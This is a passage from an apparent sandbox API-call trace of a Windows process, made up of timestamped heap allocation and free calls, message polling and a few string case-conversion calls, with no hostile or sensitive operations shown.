(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0163.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0163.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0163.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0163.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0163.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0163.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0163.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.783] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.783] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.784] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0163.784] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0163.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.784] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0163.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0163.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 